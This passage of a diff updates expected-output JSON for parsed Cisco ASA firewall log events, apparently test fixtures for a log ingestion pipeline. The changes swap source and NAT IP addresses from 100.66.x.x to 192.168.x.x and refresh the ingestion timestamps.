(192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13012,7 +13012,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.48.186", + "mapped_source_ip": "192.168.48.186", "connection_id": "11823", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13034,8 +13034,8 @@ }, "source": { "port": 53, - "address": "100.66.48.186", - "ip": "100.66.48.186" + "address": "192.168.48.186", + "ip": "192.168.48.186" }, "tags": [ "preserve_original_event" @@ -13070,7 +13070,7 @@ "localhost" ], "ip": [ - "100.66.48.186", + "192.168.48.186", "172.31.98.44" ] }, @@ -13080,8 +13080,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111925944Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", + "ingested": "2021-12-09T13:31:36.364078100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13113,8 +13113,8 @@ }, "destination": { "port": 8295, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1291, @@ -13154,7 +13154,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13162,8 +13162,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111928115Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295", + "ingested": "2021-12-09T13:31:36.364082500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13196,8 +13196,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13232,7 +13232,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13241,8 +13241,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111929889Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", + "ingested": "2021-12-09T13:31:36.364086600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13258,7 +13258,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11824", "source_interface": "outside", "mapped_destination_port": 1291 @@ -13280,8 +13280,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13316,7 +13316,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13325,8 +13325,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111932020Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364107Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -13342,7 +13342,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.254.94", + "mapped_source_ip": "192.168.254.94", "connection_id": "11825", "source_interface": "outside", "mapped_destination_port": 56132 @@ -13364,8 +13364,8 @@ }, "source": { "port": 53, - "address": "100.66.254.94", - "ip": "100.66.254.94" + "address": "192.168.254.94", + "ip": "192.168.254.94" }, "tags": [ "preserve_original_event" @@ -13400,7 +13400,7 @@ "localhost" ], "ip": [ - "100.66.254.94", + "192.168.254.94", "172.31.98.44" ] }, @@ -13410,8 +13410,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111933732Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", + "ingested": "2021-12-09T13:31:36.364112Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -13443,8 +13443,8 @@ }, "destination": { "port": 8296, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1292, @@ -13484,7 +13484,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13492,8 +13492,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111935462Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296", + "ingested": "2021-12-09T13:31:36.364116700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13526,8 +13526,8 @@ }, "source": { "port": 80, - "address": "100.66.54.190", - "ip": "100.66.54.190" + "address": "192.168.54.190", + "ip": "192.168.54.190" }, "tags": [ "preserve_original_event" @@ -13562,7 +13562,7 @@ "localhost" ], "ip": [ - "100.66.54.190", + "192.168.54.190", "172.31.98.44" ] }, @@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111937160Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:31:36.364121100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111939072Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:31:36.364125400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111940756Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:31:36.364128900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111942464Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:31:36.364133400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111944143Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:31:36.364139400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111945860Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:31:36.364145300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111947526Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:31:36.364153400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111949218Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:31:36.364158300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111950929Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:31:36.364162600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111952653Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:31:36.364167300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111954329Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:31:36.364172200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111956050Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:31:36.364176800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111957829Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:31:36.364181100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111959527Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:31:36.364185300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111961201Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:31:36.364189900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111962914Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:31:36.364193600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111964597Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:31:36.364197700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111966432Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:31:36.364201600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:02.111968117Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:31:36.364206200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111969856Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:31:36.364210200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111971542Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:31:36.364215100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, @@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111973237Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:31:36.364219200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - 